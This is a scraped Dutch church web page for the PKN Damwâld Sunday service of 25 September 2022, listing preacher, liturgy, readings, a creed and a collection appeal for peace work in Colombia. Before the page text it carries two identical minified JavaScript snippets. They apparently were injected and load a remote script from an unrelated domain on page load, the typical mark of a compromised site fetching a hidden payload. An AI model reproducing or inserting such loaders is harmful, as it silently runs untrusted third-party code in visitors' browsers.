;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 25 september 2022 9:30 uur - PKN Damwâld
zondag 25 september 2022
09:30 uur

Kerkdienst zondag 25 september 2022 9:30 uur

Informatie

Voorganger:Ds. R. Tuitman, Burgum
Organist:Joop de Jong
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
welkom
We zingen: NLB 280: 1, 2, 3, 5
bemoediging en groet, Gebed
Glorialied: NLB 150a: 1,3 en 4
korte inleiding
We zingen: Kinderlied NLB 288
Gebed om het licht van de heilige Geest
We lezen: Genesis 9, 8-17
We zingen: ‘De boog van Gods erbarmen’
We lezen: Marcus 9, 33-37
Overdenking .
Geloofsbelijdenis
Ik geloof in God, die de liefde is
en die de aarde aan alle mensen gegeven heeft.
ik geloof niet in het recht van de sterkste,
in de macht van wapens,
in de macht van onderdrukking.

Ik geloof in Jezus Christus,
die gekomen is om ons te genezen
en die ons van alle dodelijke afhankelijkheden bevrijdt.
Ik geloof niet dat oorlogen onvermijdelijk zijn,
de vrede onbereikbaar.

Ik geloof in de gemeenschap der heiligen,
de kerk die geroepen is
om in dienst van alle mensen te staan.
ik geloof niet dat lijden vergeefs moet zijn,
of dat God de vernietiging van de aarde gewild heeft.

Ik geloof dat God voor de wereld een orde wil
die op gerechtigheid en liefde gegrondvest is
en dat alle mensen
mensen met gelijke rechten zijn.

Ik geloof in Gods belofte
van een nieuwe hemel en een nieuwe aarde,
waar gerechtigheid en vrede elkaar
met een kus begroeten
in liefde, met open handen.
Vrede op aarde.
Amen.
We zingen: NLB: 675: 1en 2
We zingen: NLB 769: 1 en 6
Gebeden
slotlied : NLB 315: 1 en 2
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Uitganscollecte: Collecte Kerk in Actie Zending Columbia

Collecte Kerk in Actie 2022 – Zending (Colombia) (collectenummer 22091)
In Colombia leed men 50 jaar lang onder een burgeroorlog met 220.000 doden, 5 miljoen ontheemden en 15 miljoen armen tot gevolg. Ruim honderd vrouwen van verschillende kerkelijke achtergronden willen zich samen inzetten voor blijvende vrede in hun land, maar ook in hun huis. Vrouwen en kinderen hebben namelijk nog vaak te lijden onder huiselijk geweld. Ze volgen samen bijbelcursussen en worden vaak diep geraakt door herkenbare bijbelverhalen waarin geweld voorkomt. Hoe ga je daarna verder? Wat zegt de Bijbel over vrede en verzoening? Hoe pas je dat toe in je eigen huis en woonplaats? Ze verspreiden hun kennis in hun eigen omgeving. Dat geeft vrouwen moed en kracht om diepgeworteld geweld tegen te gaan.